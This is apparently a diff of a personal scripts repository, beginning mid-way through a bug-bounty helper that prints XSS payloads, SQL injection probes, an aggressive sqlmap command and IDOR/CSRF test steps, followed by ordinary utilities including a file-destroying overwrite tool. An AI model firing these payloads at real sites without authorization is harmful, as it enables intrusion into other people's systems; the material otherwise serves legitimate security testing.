# Each arm prints the cheat-sheet for one vulnerability class.
case "$TYPE" in
    xss)
        cat <<'EOF'
[+] Testing for XSS...
[+] Basic payload: <script>alert(1)</script>
[+] Image payload: <img src=x onerror=alert(1)>
[+] SVG payload: <svg onload=alert(1)>

[!] Test these in Burp Suite or manually
[!] Document which ones work in your findings
EOF
        ;;

    sqli)
        # Unquoted delimiter so $URL expands in the sqlmap example line.
        cat <<EOF
[+] Testing for SQL Injection...
[+] Basic test: '
[+] Boolean test: ' OR '1'='1
[+] UNION test: ' UNION SELECT NULL--
[+] Time-based: ' AND SLEEP(5)--

[!] Use sqlmap for automated testing:
sqlmap -u '$URL' --batch --risk=3 --level=5
EOF
        ;;

    idor)
        cat <<'EOF'
[+] Testing for IDOR...
[+] 1. Create two test accounts
[+] 2. Log in as User A, identify resource ID
[+] 3. Log in as User B, try to access User A's resource
[+] 4. Check if authorization is enforced

[!] Use Burp Suite to intercept and modify requests
[!] Look for IDs in: URL params, POST body, JSON, cookies
EOF
        ;;

    csrf)
        cat <<'EOF'
[+] Testing for CSRF...
[+] 1. Find state-changing action (password change, email update)
[+] 2. Intercept request in Burp Suite
[+] 3. Check for CSRF token in request
[+] 4. Remove token and replay - does it still work?
[+] 5. Check SameSite cookie attribute

[!] If no CSRF protection, create PoC HTML page
EOF
        ;;

    *)
        echo "[-] Unknown vulnerability type: $TYPE"
        echo "Types: xss, sqli, idor, csrf"
        exit 1
        ;;
esac

# Closing checklist shown for every known type.
cat <<'EOF'

[+] When you find a vulnerability:
 1. Take screenshots (Flameshot)
 2. Document PoC steps
 3. Copy template: cp ~/.claude/context/business/security/bug-bounty/templates/<type>.json ~/bug-bounty/discoveries/
 4. Fill in [BRACKETED] fields
 5. Generate report: bun run ~/.claude/context/business/security/bug-bounty/latex/generate.ts
EOF
|
||||||
53
scripts/randomize-mac
Executable file
53
scripts/randomize-mac
Executable file
|
|
@ -0,0 +1,53 @@
|
||||||
|
#!/bin/bash
# randomize-mac - Randomize MAC addresses for privacy
# Usage: sudo randomize-mac

set -euo pipefail

# NOTE(review): interface names are machine-specific — adjust per host.
ETHERNET="enp3s0"
WIFI="wlp4s0"

# Print an interface's current MAC address.
# Arguments: $1 - interface name
current_mac() {
    ip link show "$1" | grep ether | awk '{print $2}'
}

# Randomize one interface's MAC, printing before/after state.
# (The original duplicated this whole sequence per interface; interface
# names are now quoted everywhere.)
# Arguments: $1 - display label, $2 - interface name, $3 - failure hint text
randomize_iface() {
    local label="$1" iface="$2" hint="$3"
    echo "$label ($iface):"
    if ip link show "$iface" &>/dev/null; then
        echo " └─ Before: $(current_mac "$iface")"
        if macchanger -r "$iface" 2>/dev/null; then
            echo " └─ After: $(current_mac "$iface")"
            echo " └─ ✅ Randomized successfully"
        else
            echo " └─ ⚠️ Failed ($hint)"
        fi
    else
        echo " └─ ⚠️ Interface not found"
    fi
}

# macchanger needs root to bring interfaces down/up.
if [ "$EUID" -ne 0 ]; then
    echo "❌ This script must be run as root (use sudo)"
    exit 1
fi

echo "🔄 Randomizing MAC addresses..."
echo ""

randomize_iface "📡 Ethernet" "$ETHERNET" "interface may be in use"

echo ""

randomize_iface "📶 WiFi" "$WIFI" "interface may be disabled or in use"

echo ""
echo "⚠️ NOTE: You may need to reconnect to your network after randomization!"
echo ""
echo "💡 TIP: WiFi ($WIFI) is currently disabled. This script will randomize it"
echo " when you enable WiFi, preventing tracking on public networks."
|
||||||
14
scripts/receive-file.bat
Normal file
14
scripts/receive-file.bat
Normal file
|
|
@ -0,0 +1,14 @@
|
||||||
|
@echo off
REM receive-file.bat - interactive wrapper around croc for non-technical users:
REM prompts for a one-time transfer code and downloads the matching file.
REM Requires croc.exe on PATH or in the current directory.
echo ════════════════════════════════════════
echo FILE RECEIVER - Djedi Consulting
echo ════════════════════════════════════════
echo.
REM Ask for the code the sender shared out of band.
set /p CODE="Enter the code I gave you: "
echo.
echo Downloading file...
REM NOTE(review): croc saves into the current working directory; the closing
REM message assumes this script is launched from the Downloads folder.
croc.exe %CODE%
echo.
echo ════════════════════════════════════════
echo File downloaded to Downloads folder!
echo Press any key to close...
pause
|
||||||
18
scripts/rfv
Executable file
18
scripts/rfv
Executable file
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/usr/bin/env bash

# rfv - interactive code search: ripgrep feeds fzf, Enter opens the hit
# in helix (hx) at the matched line.
# Switch between Ripgrep launcher mode (CTRL-R) and fzf filtering mode (CTRL-F)

# Per-mode query stash files; removed up front so a previous session's
# queries don't leak into this one.
rm -f /tmp/rg-fzf-{r,f}
RG_PREFIX="rg --column --line-number --no-heading --color=always --smart-case "
# Everything on the command line becomes the initial search query.
INITIAL_QUERY="${*:-}"
# --disabled: fzf starts as a pure ripgrep launcher (no fuzzy filtering);
# each mode switch stashes the current query and restores the other mode's.
fzf --ansi --disabled --query "$INITIAL_QUERY" \
    --bind "start:reload($RG_PREFIX {q})+unbind(ctrl-r)" \
    --bind "change:reload:sleep 0.1; $RG_PREFIX {q} || true" \
    --bind "ctrl-f:unbind(change,ctrl-f)+change-prompt(2. fzf> )+enable-search+rebind(ctrl-r)+transform-query(echo {q} > /tmp/rg-fzf-r; cat /tmp/rg-fzf-f)" \
    --bind "ctrl-r:unbind(ctrl-r)+change-prompt(1. ripgrep> )+disable-search+reload($RG_PREFIX {q} || true)+rebind(change,ctrl-f)+transform-query(echo {q} > /tmp/rg-fzf-f; cat /tmp/rg-fzf-r)" \
    --color "hl:-1:underline,hl+:-1:underline:reverse" \
    --prompt '1. ripgrep> ' \
    --delimiter : \
    --header '╱ CTRL-R (ripgrep mode) ╱ CTRL-F (fzf mode) ╱' \
    --preview 'bat --color=always {1} --highlight-line {2}' \
    --preview-window 'up,60%,border-bottom,+{2}+3/3,~3' \
    --bind 'enter:become(hx {1} +{2})'
|
||||||
11
scripts/rn
Executable file
11
scripts/rn
Executable file
|
|
@ -0,0 +1,11 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: rn
# Description: Display current time, date, and calendar
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: rn

# Current time/date headline.
date "+%l:%M%p on %A, %B %e, %Y"
echo

# Month calendar with today's day-of-month highlighted; the trailing `|$`
# alternative keeps non-matching lines in the output too.
today=$(date '+%e')
cal | grep -E --color=always "\b${today}\b|$"
|
||||||
7
scripts/rsync-vps-backup.sh
Executable file
7
scripts/rsync-vps-backup.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
# rsync-vps-backup.sh - Pull the n8n backup archive from the VPS.
#
# Suggested cron entry (Mondays at 03:00):
# 0 3 * * 1 /home/youruser/scripts/rsync-n8n-backup.sh

# FIX: strict mode was missing entirely.
set -euo pipefail

# Remote source and local destination — replace the placeholder user/host.
SRC="yourvpsuser@yourvpsip:/home/yourvpsuser/n8n-compose/n8n-data-backup.tar.gz"
DEST="/home/youruser/backups/n8n/"

# Ensure the destination exists so the first run doesn't fail.
mkdir -p "$DEST"

rsync -avz "$SRC" "$DEST"
|
||||||
|
|
||||||
20
scripts/running
Executable file
20
scripts/running
Executable file
|
|
@ -0,0 +1,20 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: running
# Description: Better process search with PID highlighting
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: running
#        running firefox
#        running python

process_list="$(ps -eo 'pid command')"

if [[ $# != 0 ]]; then
    # FIX: join all arguments into ONE fixed-string pattern. The original
    # passed "$@" straight to grep, which treated the 2nd and later
    # arguments as file names. `|| true` keeps `set -e` from silently
    # aborting when nothing matches.
    process_list="$(echo "$process_list" | grep -Fiw -- "$*" || true)"
fi

# Hide this script itself and grep, then highlight the leading PID column.
echo "$process_list" |
    grep -Fv "${BASH_SOURCE[0]}" |
    grep -Fv grep |
    GREP_COLORS='mt=00;35' grep -E --colour=auto '^\s*[[:digit:]]+'
|
||||||
247
scripts/secure-overwrite-files
Executable file
247
scripts/secure-overwrite-files
Executable file
|
|
@ -0,0 +1,247 @@
|
||||||
|
#!/bin/bash
# secure-overwrite-files - Securely overwrite files with encrypted random data
# ⚠️  WARNING: THIS PERMANENTLY DESTROYS DATA - USE WITH EXTREME CAUTION
#
# Usage:
#   secure-overwrite-files --dry-run /path/to/files   # See what would happen
#   secure-overwrite-files /path/to/files             # Actually overwrite

set -euo pipefail

# Detect WSL and set compatibility flags
IS_WSL=false
if grep -qiE '(microsoft|wsl)' /proc/version 2>/dev/null || [ -n "${WSL_DISTRO_NAME:-}" ]; then
  IS_WSL=true
fi

# Colors for warnings
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color

# Configuration
DRY_RUN=false
TARGET_DIR=""

# Parse arguments (last non-flag argument wins as the target directory)
while [[ $# -gt 0 ]]; do
  case $1 in
    --dry-run)
      DRY_RUN=true
      shift
      ;;
    --help|-h)
      cat <<EOF
Secure File Overwriting Tool

Usage:
$0 --dry-run /path/to/files # Preview what would happen
$0 /path/to/files # Actually overwrite files

⚠️ WARNING: This PERMANENTLY DESTROYS data by overwriting with encrypted random noise.
This is IRREVERSIBLE. Ensure you have backups before proceeding.

Safety Features:
- Requires explicit directory path (won't work in current directory by accident)
- Multiple confirmation prompts
- Dry-run mode to preview actions
- Skips system directories and hidden files
- Shows file list before proceeding

Use Cases:
- Overwriting sensitive files in cloud storage before deletion
- Securely erasing data from external drives
- Preparing media for disposal

EOF
      exit 0
      ;;
    *)
      TARGET_DIR="$1"
      shift
      ;;
  esac
done

# Validate target directory
if [ -z "$TARGET_DIR" ]; then
  echo -e "${RED}❌ ERROR: No target directory specified${NC}"
  echo "Usage: $0 [--dry-run] /path/to/files"
  echo "Run with --help for more information"
  exit 1
fi

if [ ! -d "$TARGET_DIR" ]; then
  echo -e "${RED}❌ ERROR: Directory does not exist: $TARGET_DIR${NC}"
  exit 1
fi

# Convert to absolute path
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)

# Safety check: Don't allow certain dangerous paths
DANGEROUS_PATHS=(
  "/"
  "/home"
  "/etc"
  "/usr"
  "/var"
  "/bin"
  "/sbin"
  "/boot"
  "$HOME"
  "$HOME/.ssh"
  "$HOME/.gnupg"
)

for dangerous in "${DANGEROUS_PATHS[@]}"; do
  if [ "$TARGET_DIR" = "$dangerous" ]; then
    echo -e "${RED}❌ DANGER: Refusing to operate on system directory: $TARGET_DIR${NC}"
    echo "This would destroy your system!"
    exit 1
  fi
done

# Get list of files (skip hidden files and directories)
# Using portable array building that works on WSL, Linux, and any bash 3.2+
FILES=()
while IFS= read -r -d '' file; do
  FILES+=("$file")
done < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*" -print0)

if [ ${#FILES[@]} -eq 0 ]; then
  echo -e "${YELLOW}⚠️ No files found in: $TARGET_DIR${NC}"
  exit 0
fi

# Display warnings and file list
echo ""
echo -e "${RED}╔════════════════════════════════════════════════════════════╗${NC}"
echo -e "${RED}║ ⚠️  SECURE FILE OVERWRITE - IRREVERSIBLE DATA DESTRUCTION ║${NC}"
echo -e "${RED}╚════════════════════════════════════════════════════════════╝${NC}"
echo ""
echo -e "${YELLOW}Target Directory:${NC} $TARGET_DIR"
echo -e "${YELLOW}Files to overwrite:${NC} ${#FILES[@]}"
if [ "$IS_WSL" = true ]; then
  echo -e "${YELLOW}Environment:${NC} WSL (Windows Subsystem for Linux)"
fi
echo ""
echo "The following files will be PERMANENTLY DESTROYED:"
echo ""

for file in "${FILES[@]}"; do
  filename=$(basename "$file")
  filesize=$(du -h "$file" | cut -f1)
  echo " 📄 $filename ($filesize)"
done

echo ""

if [ "$DRY_RUN" = true ]; then
  echo -e "${GREEN}🔍 DRY RUN MODE - No files will be modified${NC}"
  echo ""
  echo "What would happen:"
  echo " 1. Each file above would be overwritten with encrypted random data"
  echo " 2. Original content would be permanently destroyed"
  echo " 3. Files would remain with same names but contain only encrypted noise"
  echo ""
  echo "To actually perform this operation, run:"
  echo " $0 $TARGET_DIR"
  echo ""
  exit 0
fi

# First confirmation. read -r so a backslash in the reply is taken literally
# instead of being interpreted as an escape.
echo -e "${RED}⚠️ THIS WILL PERMANENTLY DESTROY ${#FILES[@]} FILES!${NC}"
echo ""
read -r -p "Are you ABSOLUTELY SURE you want to continue? Type 'YES' in all caps: " confirm1

if [ "$confirm1" != "YES" ]; then
  echo -e "${GREEN}✅ Aborted. No files were modified.${NC}"
  exit 0
fi

# Second confirmation with directory name
echo ""
echo -e "${RED}⚠️ FINAL CONFIRMATION${NC}"
echo "You are about to overwrite all files in:"
echo " $TARGET_DIR"
echo ""
read -r -p "Type the full directory path to confirm: " confirm2

if [ "$confirm2" != "$TARGET_DIR" ]; then
  echo -e "${GREEN}✅ Aborted. Path did not match. No files were modified.${NC}"
  exit 0
fi

# Third confirmation - countdown
echo ""
echo -e "${RED}Beginning file destruction in:${NC}"
for i in 5 4 3 2 1; do
  echo " $i..."
  sleep 1
done
echo ""

# Perform the overwriting
echo -e "${YELLOW}🔄 Overwriting files with encrypted random data...${NC}"
echo ""

SUCCESS_COUNT=0
FAIL_COUNT=0

for file in "${FILES[@]}"; do
  filename=$(basename "$file")
  filesize=$(stat -c%s "$file")

  # Round up to whole MiB of random data. The "+1" already guarantees a
  # minimum of 1MB even for empty files, so the original "< 1" lower-bound
  # check was dead code and has been removed.
  size_mb=$(( (filesize / 1048576) + 1 ))

  printf " 📄 %s ... " "$filename"

  # Flush output immediately
  sync 2>/dev/null || true

  # Create encrypted random data with same name. The throwaway passphrase is
  # never stored, so the result is unrecoverable noise.
  if dd if=/dev/urandom bs=1M count="$size_mb" 2>/dev/null | \
     gpg --symmetric --cipher-algo AES256 --batch \
       --passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then

    # Verify temp file was created
    if [ ! -f "${file}.tmp" ]; then
      printf "${RED}✗ Failed (temp file not created)${NC}\n"
      ((FAIL_COUNT++)) || true
      continue
    fi

    # Replace original with encrypted noise (both variables fully quoted)
    if mv "${file}.tmp" "${file}"; then
      printf "${GREEN}✓ Destroyed${NC}\n"
      ((SUCCESS_COUNT++)) || true
    else
      printf "${RED}✗ Failed (mv error: $?)${NC}\n"
      ((FAIL_COUNT++)) || true
      rm -f "${file}.tmp" 2>/dev/null || true
    fi
  else
    printf "${RED}✗ Failed (encryption error)${NC}\n"
    ((FAIL_COUNT++)) || true
    rm -f "${file}.tmp" 2>/dev/null || true
  fi
done

echo ""
echo "═══════════════════════════════════════"
echo -e "${GREEN}✅ Complete${NC}"
echo " Successfully destroyed: $SUCCESS_COUNT files"
if [ "$FAIL_COUNT" -gt 0 ]; then
  echo -e " ${RED}Failed: $FAIL_COUNT files${NC}"
fi
echo ""
echo "⚠️ Original data is now PERMANENTLY UNRECOVERABLE"
echo "You can now delete these files from cloud storage."
echo ""
|
||||||
72
scripts/secure-overwrite-files-debug
Executable file
72
scripts/secure-overwrite-files-debug
Executable file
|
|
@ -0,0 +1,72 @@
|
||||||
|
#!/bin/bash
# DEBUG VERSION - Shows exactly what commands are being run
# Usage: secure-overwrite-files-debug /path/to/directory

set -euo pipefail
set -x # Print every command before executing

# Fail with a usage message instead of set -u's cryptic
# "$1: unbound variable" when invoked without an argument.
TARGET_DIR="${1:-}"
if [ -z "$TARGET_DIR" ]; then
  echo "Usage: $0 /path/to/directory" >&2
  exit 1
fi

if [ ! -d "$TARGET_DIR" ]; then
  echo "ERROR: Not a directory: $TARGET_DIR"
  exit 1
fi

TARGET_DIR=$(cd "$TARGET_DIR" && pwd)

# NUL-delimited so filenames containing newlines survive intact.
mapfile -d '' -t FILES < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*" -print0)

echo "Found ${#FILES[@]} files:"
for file in "${FILES[@]}"; do
  echo " - $file"
done

echo ""
echo "Processing files..."

for file in "${FILES[@]}"; do
  filename=$(basename "$file")
  filesize=$(stat -c%s "$file")

  # Round up to whole MiB; "+1" already guarantees a minimum of 1MB, so the
  # original "< 1" check was dead code and has been removed.
  size_mb=$(( (filesize / 1048576) + 1 ))

  echo ""
  echo "=== Processing: $filename ==="
  echo " Full path: $file"
  echo " Size: ${filesize} bytes"
  echo " Will create: ${size_mb}MB encrypted file"
  echo " Temp file: ${file}.tmp"

  echo -n " Creating encrypted data... "
  if dd if=/dev/urandom bs=1M count="$size_mb" 2>/dev/null | \
     gpg --symmetric --cipher-algo AES256 --batch \
       --passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
    echo "✓"

    echo " Temp file created:"
    ls -lh "${file}.tmp"

    echo -n " Moving temp to final location... "
    echo " Command: mv \"${file}.tmp\" \"${file}\""

    if mv "${file}.tmp" "${file}"; then
      echo "✓ SUCCESS"
      echo " Final file:"
      ls -lh "$file"
    else
      # Capture mv's status immediately: the original printed $? AFTER
      # another echo had already reset it, so it always showed 0.
      rc=$?
      echo "✗ FAILED"
      echo " ERROR CODE: $rc"
      ls -la "${file}.tmp" "$file" 2>&1 || true
    fi
  else
    echo "✗ FAILED to create encrypted file"
  fi
done

echo ""
echo "=== COMPLETE ==="
echo "Final directory state:"
ls -lah "$TARGET_DIR"
|
||||||
84
scripts/send-ntfy
Executable file
84
scripts/send-ntfy
Executable file
|
|
@ -0,0 +1,84 @@
|
||||||
|
#!/bin/bash
# send-ntfy - Send notification via ntfy using credentials from ~/.env
#
# Required in ~/.env: NTFY_URL, and either NTFY_TOKEN (bearer) or
# NTFY_AUTH (user:pass for basic auth).

set -euo pipefail

# Load credentials from ~/.env (set -a exports everything it defines)
if [ -f "$HOME/.env" ]; then
  set -a
  source "$HOME/.env"
  set +a
else
  echo "Error: ~/.env not found" >&2
  exit 1
fi

# Check for URL
if [ -z "${NTFY_URL:-}" ]; then
  echo "Error: NTFY_URL must be set in ~/.env" >&2
  exit 1
fi

# Add https:// if missing
if [[ ! "$NTFY_URL" =~ ^https?:// ]]; then
  NTFY_URL="https://$NTFY_URL"
fi

# Parse arguments
TOPIC="${1:-alerts}"
MESSAGE="${2:-}"
TITLE="${3:-}"
PRIORITY="${4:-default}"
TAGS="${5:-}"

if [ -z "$MESSAGE" ]; then
  echo "Usage: send-ntfy <topic> <message> [title] [priority] [tags]" >&2
  echo "" >&2
  echo "Examples:" >&2
  echo " send-ntfy alerts 'Backup completed'" >&2
  echo " send-ntfy security 'Suspicious login' 'Security Alert' urgent 'warning,shield'" >&2
  echo " send-ntfy personal 'Meeting in 5 minutes'" >&2
  exit 1
fi

# Build full URL with topic
FULL_URL="$NTFY_URL/$TOPIC"

# Build curl options array (the -w trailer appends the HTTP code on its own line)
CURL_OPTS=(
  -s
  --http1.1
  -w "\n%{http_code}"
  -d "$MESSAGE"
)

# Add authentication
if [ -n "${NTFY_TOKEN:-}" ]; then
  CURL_OPTS+=(-H "Authorization: Bearer $NTFY_TOKEN")
elif [ -n "${NTFY_AUTH:-}" ]; then
  CURL_OPTS+=(-u "$NTFY_AUTH")
else
  echo "Error: NTFY_TOKEN or NTFY_AUTH must be set in ~/.env" >&2
  exit 1
fi

# Add optional headers
[ -n "$TITLE" ] && CURL_OPTS+=(-H "Title: $TITLE")
[ -n "$PRIORITY" ] && CURL_OPTS+=(-H "Priority: $PRIORITY")
[ -n "$TAGS" ] && CURL_OPTS+=(-H "Tags: $TAGS")

# Send notification. Guard the substitution so a transport-level curl
# failure (DNS, refused connection, TLS) produces a diagnostic instead of
# set -e silently killing the script.
if ! RESULT=$(curl "${CURL_OPTS[@]}" "$FULL_URL" 2>&1); then
  echo "❌ Failed: curl error: $RESULT" >&2
  exit 1
fi

# Extract HTTP code (last line) from the body (everything before it)
HTTP_CODE=$(echo "$RESULT" | tail -1)
RESPONSE=$(echo "$RESULT" | sed '$d')

if [ "$HTTP_CODE" = "200" ]; then
  echo "✅ Notification sent to $TOPIC"
  exit 0
else
  echo "❌ Failed: HTTP $HTTP_CODE" >&2
  [ -n "$RESPONSE" ] && echo "Response: $RESPONSE" >&2
  exit 1
fi
|
||||||
30
scripts/serveit
Executable file
30
scripts/serveit
Executable file
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: serveit
# Description: Quick static file server on localhost
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: serveit [port]   # defaults to 8000

# Exactly one argument overrides the default port; otherwise keep 8000.
listen_port='8000'
if [[ $# -eq 1 ]]; then
  listen_port="$1"
fi

# Pick the first available runtime: PHP, then Python 3, then any Python
# (dispatching on its major version), then Ruby.
if command -v php >/dev/null 2>&1; then
  exec php -S "localhost:$listen_port"
elif command -v python3 >/dev/null 2>&1; then
  exec python3 -m http.server "$listen_port"
elif command -v python >/dev/null 2>&1; then
  py_major="$(python -c 'import platform as p;print(p.python_version_tuple()[0])')"
  case "$py_major" in
    3) exec python -m http.server "$listen_port" ;;
    *) exec python -m SimpleHTTPServer "$listen_port" ;;
  esac
elif command -v ruby >/dev/null 2>&1; then
  exec ruby -run -e httpd . -p "$listen_port"
else
  echo 'unable to start HTTP server' >&2
  exit 1
fi
|
||||||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue